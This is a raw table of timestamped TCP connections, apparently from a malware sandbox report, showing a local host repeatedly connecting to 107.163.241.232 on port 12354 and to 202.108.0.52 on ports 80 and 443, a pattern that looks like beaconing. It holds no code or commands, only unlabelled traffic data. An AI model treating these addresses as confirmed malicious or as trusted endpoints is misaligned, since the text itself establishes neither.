Dec 11, 2024 16:29:56.118988037 CET	64996	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:56.238420010 CET	80	64996	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:56.335042000 CET	64996	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:56.335117102 CET	63920	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:56.335141897 CET	63794	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:56.335810900 CET	65326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:56.450840950 CET	65458	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:56.450943947 CET	65459	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:56.456001043 CET	12354	65326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:56.456098080 CET	65326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:56.456329107 CET	65326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:56.570532084 CET	12354	65458	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:56.570573092 CET	80	65459	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:56.570686102 CET	65458	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:56.570779085 CET	65459	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:56.575611115 CET	12354	65326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:56.581345081 CET	65458	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:56.581864119 CET	65459	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:56.700702906 CET	12354	65458	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:56.701142073 CET	80	65459	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:58.170674086 CET	80	65459	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:58.171291113 CET	65459	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:58.219221115 CET	50640	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:58.219285965 CET	443	50640	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:58.219379902 CET	50640	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:58.219705105 CET	50640	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:58.219717026 CET	443	50640	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:58.567260981 CET	12354	65326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:58.567359924 CET	65326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.572478056 CET	65326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.573263884 CET	50825	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.677155972 CET	12354	65458	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:58.677205086 CET	65458	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.678540945 CET	65458	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.689965010 CET	50847	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.692037106 CET	12354	65326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:58.692703962 CET	12354	50825	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:58.692766905 CET	50825	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.695389032 CET	50825	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.797986031 CET	12354	65458	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:58.809411049 CET	12354	50847	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:58.809489965 CET	50847	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.812658072 CET	50847	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:58.814860106 CET	12354	50825	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:58.932753086 CET	12354	50847	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:59.913081884 CET	443	50640	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:59.913203955 CET	50640	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:59.913881063 CET	443	50640	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:59.914098024 CET	50640	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:59.923342943 CET	50640	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:59.923492908 CET	443	50640	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:59.923770905 CET	443	50640	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:59.923867941 CET	50640	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:59.923867941 CET	50640	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:00.351175070 CET	50847	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:00.351357937 CET	50825	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:00.354187965 CET	52005	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:00.410165071 CET	65459	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:00.410655975 CET	52071	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:00.473951101 CET	12354	52005	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:00.474040031 CET	52005	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:00.474646091 CET	52005	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:00.511018038 CET	52150	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:00.534559965 CET	80	65459	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:00.534575939 CET	80	52071	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:00.534625053 CET	65459	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:00.534665108 CET	52071	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:00.535238981 CET	52071	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:00.595235109 CET	12354	52005	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:00.632317066 CET	12354	52150	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:00.632385015 CET	52150	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:00.636677980 CET	52150	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:00.659446955 CET	80	52071	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:00.764182091 CET	12354	52150	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:02.107914925 CET	80	52071	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:02.108050108 CET	52071	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:02.322892904 CET	53648	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:02.322961092 CET	443	53648	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:02.327632904 CET	53648	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:02.331974983 CET	53648	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:02.331999063 CET	443	53648	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:02.605490923 CET	12354	52005	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:02.605565071 CET	52005	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:02.606447935 CET	52005	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:02.607027054 CET	53912	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:02.725825071 CET	12354	52005	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:02.726597071 CET	12354	53912	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:02.726667881 CET	53912	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:02.727519035 CET	53912	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:02.755995989 CET	12354	52150	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:02.756051064 CET	52150	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:02.756396055 CET	52150	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:02.762598991 CET	54033	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:02.847060919 CET	12354	53912	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:02.887599945 CET	12354	52150	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:02.887610912 CET	12354	54033	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:02.887690067 CET	54033	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:02.888201952 CET	54033	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:03.009524107 CET	12354	54033	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:04.076478958 CET	443	53648	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:04.076841116 CET	53648	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.079153061 CET	443	53648	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:04.079718113 CET	53648	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.084434986 CET	53648	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.084532976 CET	443	53648	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:04.084733963 CET	443	53648	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:04.085103035 CET	53648	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.085103035 CET	53648	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.355668068 CET	53912	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:04.355984926 CET	54033	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:04.358175039 CET	55293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:04.469818115 CET	52071	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.470216036 CET	55346	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.477685928 CET	12354	55293	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:04.477793932 CET	55293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:04.505065918 CET	55293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:04.575474024 CET	55419	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:04.589832067 CET	80	55346	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:04.589915991 CET	55346	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.590329885 CET	55346	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.590540886 CET	80	52071	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:04.590595007 CET	52071	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:04.624548912 CET	12354	55293	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:04.709477901 CET	12354	55419	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:04.709568024 CET	80	55346	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:04.709604979 CET	55419	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:04.710226059 CET	55419	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:04.831806898 CET	12354	55419	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:06.155894995 CET	80	55346	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:06.155996084 CET	55346	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:06.270596981 CET	56937	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:06.270638943 CET	443	56937	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:06.270746946 CET	56937	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:06.271806955 CET	56937	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:06.271819115 CET	443	56937	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:06.582156897 CET	12354	55293	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:06.582272053 CET	55293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:06.589138985 CET	55293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:06.589730024 CET	57129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:06.709048986 CET	12354	55293	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:06.709230900 CET	12354	57129	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:06.709297895 CET	57129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:06.710340977 CET	57129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:06.830800056 CET	12354	57129	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:06.833609104 CET	12354	55419	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:06.833678007 CET	55419	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:06.834533930 CET	55419	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:06.835141897 CET	57352	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:06.954482079 CET	12354	55419	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:06.955219984 CET	12354	57352	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:06.955285072 CET	57352	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:06.955446005 CET	57352	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:07.076266050 CET	12354	57352	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:07.959981918 CET	443	56937	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:07.960170031 CET	56937	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:07.960767984 CET	443	56937	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:07.961088896 CET	56937	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:07.965106964 CET	56937	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:07.965181112 CET	443	56937	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:07.965339899 CET	56937	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.109246969 CET	55346	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.109644890 CET	58445	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.229150057 CET	80	55346	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:08.229168892 CET	80	58445	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:08.229223013 CET	55346	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.229274035 CET	58445	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.229815006 CET	58445	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.351203918 CET	80	58445	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:08.366388083 CET	57352	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:08.366421938 CET	57129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:08.366462946 CET	58445	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.367069006 CET	58562	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:08.500186920 CET	58707	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.500567913 CET	58708	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:08.562957048 CET	12354	58562	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:08.563050985 CET	58562	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:08.563421011 CET	58562	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:08.683202982 CET	80	58707	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:08.683218002 CET	12354	58708	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:08.683267117 CET	12354	58562	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:08.683293104 CET	58707	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.683577061 CET	58708	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:08.687176943 CET	58707	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:08.687482119 CET	58708	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:08.807233095 CET	80	58707	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:08.807455063 CET	12354	58708	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:10.680135012 CET	12354	58562	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:10.680304050 CET	58562	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:10.693104982 CET	58562	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:10.693522930 CET	60021	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:10.788213968 CET	12354	58708	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:10.788310051 CET	58708	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:10.793948889 CET	58708	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:10.813112020 CET	60121	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:10.813288927 CET	12354	58562	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:10.813457012 CET	12354	60021	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:10.813515902 CET	60021	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:10.813684940 CET	60021	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:10.915518999 CET	12354	58708	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:10.934130907 CET	12354	60121	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:10.934144974 CET	12354	60021	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:10.934247017 CET	60121	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:10.935210943 CET	60121	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:11.054730892 CET	12354	60121	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:12.370390892 CET	60121	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:12.370441914 CET	60021	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:12.370459080 CET	58707	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:12.370976925 CET	61491	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:12.490823984 CET	12354	61491	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:12.491029978 CET	61491	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:12.492974043 CET	61491	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:12.495414972 CET	61570	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:12.496149063 CET	61571	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:12.612765074 CET	12354	61491	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:12.615511894 CET	12354	61570	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:12.615524054 CET	80	61571	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:12.615680933 CET	61570	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:12.615950108 CET	61571	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:12.616545916 CET	61570	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:12.616769075 CET	61571	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:12.738111019 CET	12354	61570	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:12.738243103 CET	80	61571	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:14.191390038 CET	80	61571	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:14.191474915 CET	61571	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:14.195200920 CET	63100	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:14.195244074 CET	443	63100	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:14.195336103 CET	63100	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:14.204231977 CET	63100	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:14.204256058 CET	443	63100	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:14.599457026 CET	12354	61491	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:14.599528074 CET	61491	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.602405071 CET	61491	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.603564024 CET	63505	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.722235918 CET	12354	61491	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:14.722927094 CET	12354	63505	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:14.723000050 CET	63505	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.723709106 CET	63505	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.742477894 CET	12354	61570	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:14.742552042 CET	61570	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.743030071 CET	61570	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.743422985 CET	63612	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.843463898 CET	12354	63505	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:14.862411022 CET	12354	61570	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:14.862704039 CET	12354	63612	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:14.862777948 CET	63612	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.863187075 CET	63612	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:14.985414028 CET	12354	63612	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:15.906745911 CET	443	63100	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:15.906850100 CET	63100	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:15.907576084 CET	443	63100	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:15.910183907 CET	63100	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:15.913861990 CET	63100	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:15.913970947 CET	443	63100	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:15.914066076 CET	63100	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.060870886 CET	61571	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.061455965 CET	64919	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.181030035 CET	80	61571	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:16.181058884 CET	80	64919	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:16.181107998 CET	61571	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.181173086 CET	64919	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.194751978 CET	64919	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.332304955 CET	80	64919	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:16.496126890 CET	64919	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.496187925 CET	63612	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:16.496227026 CET	63505	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:16.502429008 CET	65323	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:16.624008894 CET	65388	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.624129057 CET	12354	65323	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:16.624207020 CET	65323	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:16.624424934 CET	65389	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:16.624842882 CET	65323	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:16.745521069 CET	80	65388	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:16.745539904 CET	12354	65389	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:16.745733976 CET	65388	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.745764971 CET	12354	65323	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:16.745801926 CET	65389	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:16.746526003 CET	65388	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:16.746642113 CET	65389	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:16.868840933 CET	80	65388	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:16.868885994 CET	12354	65389	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:18.315013885 CET	80	65388	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:18.315083027 CET	65388	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:18.343734980 CET	50503	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:18.343779087 CET	443	50503	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:18.343871117 CET	50503	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:18.344360113 CET	50503	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:18.344372988 CET	443	50503	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:18.739866972 CET	12354	65323	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:18.739972115 CET	65323	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:18.740750074 CET	65323	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:18.741847038 CET	50829	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:18.860091925 CET	12354	65323	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:18.861213923 CET	12354	50829	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:18.861547947 CET	50829	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:18.862349033 CET	50829	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:18.865318060 CET	12354	65389	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:18.865407944 CET	65389	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:18.866133928 CET	65389	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:18.867084026 CET	50975	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:18.981986046 CET	12354	50829	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:18.985685110 CET	12354	65389	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:18.986455917 CET	12354	50975	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:18.986541033 CET	50975	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:18.989269972 CET	50975	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:19.108717918 CET	12354	50975	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:20.050520897 CET	443	50503	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:20.050611019 CET	50503	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.051325083 CET	443	50503	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:20.051383972 CET	50503	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.056256056 CET	50503	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.056298971 CET	443	50503	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:20.056440115 CET	50503	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.260971069 CET	65388	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.261261940 CET	52098	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.381030083 CET	80	52098	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:20.381050110 CET	80	65388	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:20.381133080 CET	65388	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.381134033 CET	52098	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.392895937 CET	52098	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.508177042 CET	52098	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.508296967 CET	50975	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:20.508328915 CET	50829	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:20.509432077 CET	52158	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:20.512799978 CET	80	52098	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:20.512881994 CET	52098	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.628990889 CET	12354	52158	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:20.629146099 CET	52158	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:20.644670010 CET	52198	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:20.650377989 CET	52158	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:20.664937019 CET	52201	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.767481089 CET	12354	52198	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:20.767587900 CET	52198	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:20.771435022 CET	12354	52158	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:20.776514053 CET	52198	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:20.784560919 CET	80	52201	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:20.784650087 CET	52201	80	192.168.2.7	202.108.0.52
